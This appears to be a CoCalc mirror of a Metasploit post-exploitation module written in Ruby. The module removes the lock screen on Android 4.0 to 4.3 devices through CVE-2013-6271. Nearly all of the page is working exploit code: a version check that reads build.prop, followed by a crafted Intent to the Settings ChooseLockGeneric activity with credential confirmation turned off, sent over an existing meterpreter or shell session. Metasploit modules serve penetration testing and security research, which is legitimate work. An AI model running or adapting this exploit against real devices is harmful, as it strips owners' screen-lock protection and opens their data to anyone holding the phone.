CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/manage/remove_lock.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  Rank = NormalRanking

8


9
  include Msf::Post::Common

10
  include Msf::Post::Android::System

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        {

17
          'Name' => 'Android Settings Remove Device Locks (4.0-4.3)',

18
          'Description' => %q{

19
            This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.

20
            Any unprivileged app can exploit this vulnerability to remove the lockscreen.

21
            A logic flaw / design error exists in the settings application that allows an Intent from any

22
            application to clear the screen lock. The user may see that the Settings application has crashed,

23
            and the phone can then be unlocked by a swipe.

24
            This vulnerability was patched in Android 4.4.

25
          },

26
          'License' => MSF_LICENSE,

27
          'Author' => [

28
            'CureSec', # discovery

29
            'timwr' # metasploit module

30
          ],

31
          'References' => [

32
            [ 'CVE', '2013-6271' ],

33
            [ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],

34
            [ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]

35
          ],

36
          'SessionTypes' => [ 'meterpreter', 'shell' ],

37
          'Platform' => 'android',

38
          'DisclosureDate' => '2013-10-11',

39
          'Compat' => {

40
            'Meterpreter' => {

41
              'Commands' => %w[

42
                android_*

43
              ]

44
            }

45
          }

46
        }

47
      )

48
    )

49
  end

50


51
  def is_version_compat?

52
    build_prop = get_build_prop

53


54
    # Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns

55
    # empty.

56
    if build_prop.empty?

57
      fail_with(Failure::Unknown, 'Failed to retrieve build.prop, you might need to try again.')

58
    end

59


60
    android_version = Rex::Version.new(build_prop['ro.build.version.release'])

61
    if android_version <= Rex::Version.new('4.3') && android_version >= Rex::Version.new('4.0')

62
      return true

63
    end

64


65
    false

66
  end

67


68
  def run

69
    unless is_version_compat?

70
      print_error('This module is only compatible with Android versions 4.0 to 4.3')

71
      return

72
    end

73


74
    result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end')

75
    if result.nil?

76
      print_good('Intent started, the lock screen should now be a dud.')

77
      print_good('Go ahead and manually swipe or provide any pin/password/pattern to continue.')

78
    else

79
      print_error("The Intent could not be started: #{result}")

80
    end

81
  end

82
end

83


84